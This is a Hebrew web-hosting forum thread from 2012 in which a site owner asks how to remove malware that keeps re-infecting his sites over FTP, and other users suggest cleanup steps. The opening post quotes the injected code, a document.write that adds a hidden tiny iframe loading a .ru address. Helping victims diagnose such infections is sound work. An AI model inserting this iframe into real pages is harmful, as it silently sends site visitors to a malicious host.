הוסטס - פורום אחסון האתרים הגדול בישראל

הוסטס - פורום אחסון האתרים הגדול בישראל (https://hosts.co.il/forums/index.php)
-   פורום תיכנות (https://hosts.co.il/forums/forumdisplay.php?f=14)
-   -   בעיה|וירוס באתר (https://hosts.co.il/forums/showthread.php?t=98556)

Mishel 12-07-12 14:45
בעיה|וירוס באתר
 
שלום, יש לי בעיה בכמה אתרים שלי, ברובם יש וירוסים, לאחר שדיברתי עם כמה אנשים אמרו לי שזה בא מהמחשב שלי ושאני מתחבר לFTP זה פשוט מדביק את כל האתרים, עכשיו בקיצור הם שלחו לי גם
מסמך טקסט עם קישורים איפה הוירוס נמצא וניקיתי הכל, לאחר מכן התגלו שוב וירוסים ולהפתעתי פתחתי את כל הקבצים של האתר (הכל כולל הכל, גם CSS, גם JS פשוט הכל!) ולא הייתה שורה אחד של הוירוס, אבל שמסתכלים בקוד מקור עדיין רואים את הקוד.

מה אני יכול לעשות? לפי מה שהבנתי האנטי וירוס NOD חוסם את האתר שלי ואני בטוח שגם גוגל מזהיר, מה הפיתרון?

השורה של הוירוס:

ציטוט:
document.write('<iframe src="http://flip sph ere .ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
(אם נכנסים לקישור זה מעביר לBING)

לפי מה שהבנתי זאת בעיה מאוד ידועה היום והרבה בעלי אתרים נתקלים בה, וגם למיטב הבנתי האנטי וירוס לא מתמודד עם הוירוס הזה.

מה אפשר לעשות?

IgalSt 12-07-12 15:19
לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק.

לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת)..
השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים.
עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק).

כשאתה מסיים, העלה את הקבצים לשרת.

Mishel 12-07-12 16:24
ציטוט:
נכתב במקור על ידי IgalSt (פרסם 850800)
לפני שמתחילים, חשוב לנקות את המחשב שלך מוירוסים כדי שהפעולות שלך לא יהיו לריק.

לאחר מכן, עליך להוריד את InfoRapid Search & Replace (או כל תוכנה דומה אחרת)..
השתמש בתוכנה הזאת על מנת להריץ חיפוש והחלפה בקבצים החשודים כנגועים.
עליך לחפש את הקוד שהוירוס שתל בעמודים שלך, ולהחליף אותו בשום דבר (כלומר סטרינג ריק).

כשאתה מסיים, העלה את הקבצים לשרת.
המחשב שלי כבר עבר סריקה, כרגע אני מוריד את התוכנה שהצעת, אני פשוט מכניס לתוכנה את הקבצים ומה אז?

ותודה רבה :)

עריכה: לא חושב שהוירוס הוסר מהמחשב, אמרו לי לפרמט אבל זה בעיה גדולה עכשיו, אין דרך אחרת?

IgalSt 12-07-12 20:27
ציטוט:
נכתב במקור על ידי Wekey (פרסם 850803)
המחשב שלי כבר עבר סריקה, כרגע אני מוריד את התוכנה שהצעת, אני פשוט מכניס לתוכנה את הקבצים ומה אז?

ותודה רבה :)

עריכה: לא חושב שהוירוס הוסר מהמחשב, אמרו לי לפרמט אבל זה בעיה גדולה עכשיו, אין דרך אחרת?
אם יש לך וירוס במחשב שכל פעם "מדביק" את הקבצים כשאתה מנקה אותם, נשמע כאילו שאכן אין דרך אחרת.
מה שכן, הייתי שוקל להשתמש במחשב חלופי על מנת לנקות את הקבצים ולהעלותם לשרת על מנת לחזור לפעילות סדירה ASAP.

בניה 12-07-12 21:33
תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה
כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך

Mishel 12-07-12 22:36
ציטוט:
נכתב במקור על ידי IgalSt (פרסם 850825)
אם יש לך וירוס במחשב שכל פעם "מדביק" את הקבצים כשאתה מנקה אותם, נשמע כאילו שאכן אין דרך אחרת.
מה שכן, הייתי שוקל להשתמש במחשב חלופי על מנת לנקות את הקבצים ולהעלותם לשרת על מנת לחזור לפעילות סדירה ASAP.
אבל איך לנקות את הקבצים? חלקם עם מערכות ווורדפרס וגם שאני פותח קובץ קובץ אני לא מוצא את הנגועים.. בעיה גדולה.
ציטוט:
נכתב במקור על ידי בניה (פרסם 850839)
תנסה לסרוק את המחשב עם MALWARE BYTES, הסיר לי משהו דומה
כמו כן, אפשר להשתמש בGOOGLE DEVELOPER TOOLS כדי להבין אילו קבצים נגועים ולבקש מגוגל לסרוק מחדש כדי שיסירו את ההזהרה בכניסה לדומיין שלך
סרקתי איתה כל הלילה ומצאה כמה מזיקים, הסרתי אותם, ובקשר לגוגל - נכנסתי לכלי מנהל האתרים אבל לא מצאתי בשום מקום רשימה של הקבצים הנגועים..

עריכה: מוזר מאוד, נכנסתי ל"אחזר כמו גוגל", הוא סיים את הפעולה ואז הוציא את הקוד מקור של האתר, אני רואה את השורה של הוירוס אבל אין אזהרה ואין כלום, גם שנכנסים ל"תוכנה זדונית".

IgalSt 13-07-12 12:14
ציטוט:
נכתב במקור על ידי Wekey (פרסם 850853)
אבל איך לנקות את הקבצים? חלקם עם מערכות ווורדפרס וגם שאני פותח קובץ קובץ אני לא מוצא את הנגועים.. בעיה גדולה.
הרי לא סביר שתעבור על עשרות קבצים ידנית. זו בדיוק הסיבה שבגללה הבאתי לך את התונכה שיודעת לחפש בכל קבצים ממש מהר ולהחליף את התוכן שאתה מחפש במשהו אחר. השתמש בה.


ציטוט:
נכתב במקור על ידי Wekey (פרסם 850853)
סרקתי איתה כל הלילה ומצאה כמה מזיקים, הסרתי אותם, ובקשר לגוגל - נכנסתי לכלי מנהל האתרים אבל לא מצאתי בשום מקום רשימה של הקבצים הנגועים..

עריכה: מוזר מאוד, נכנסתי ל"אחזר כמו גוגל", הוא סיים את הפעולה ואז הוציא את הקוד מקור של האתר, אני רואה את השורה של הוירוס אבל אין אזהרה ואין כלום, גם שנכנסים ל"תוכנה זדונית".
ייתכן ולא כל תוכנות האנטיוירוס מזהות את זה כקוד זדוני. אבל זה בהחלט אחד כזה ואתה צריך לטפל בבעיה.

BuildDream 13-07-12 13:57
כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר
יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף.

וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה..
יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים.

יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים

Mishel 13-07-12 14:34
ציטוט:
נכתב במקור על ידי BuildDream (פרסם 850915)
כשאתה אומר שסרקת את כל הקבצי PHP, HTML של האתר שלך ולא ראית שום קוד זדוני - זה לא אומר שהוא לא קיים באתר
יש כ"כ הרבה אפשרויות להוסיף קוד לאתר - למשל בphp.ini אתה יכול להגדיר קוד שיתווסף אוטומטית אחרי/לפני כל דף שהוא מפרסר. וזאת רק דרך אחת מאלף.

וזה שיש לך שורות קוד שלא אתה כתבת באתר זה לא מחייב שזה וירוס, ובגלל זה יכול להיות שהוא לא רושם לך התראה על זה..
יש קודים שרק אוספים מידע, שותלים פרסומות וכל מיני דברים כאלה ולא מכילים וירוסים.

יכול להיות שזה וירוס במחשב שלך, ויכול להיות גם שהשרת שלך נפרץ ובכל פעם שמים לך קודים כאלה. יש המון דרכים לשתול קוד באתרים
זה היה טעות שלי, הוירוס בא ממני, פשוט לאחר שאני מוחק את השורות של הוירוס והם אני לא רואה אותם הם חוזרים שוב.
ובקשר לשרת - לא, נעשו בדיקות מקיפות עם 2 טכנאים על הדברים האלה.

בכל מקרה כרגע אני מנקה את כל האתרים עם התוכנה שיגאל נתן.

תודה רבה לכולם.


כל הזמנים הם GMT +2. הזמן כעת הוא 20:32.

מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ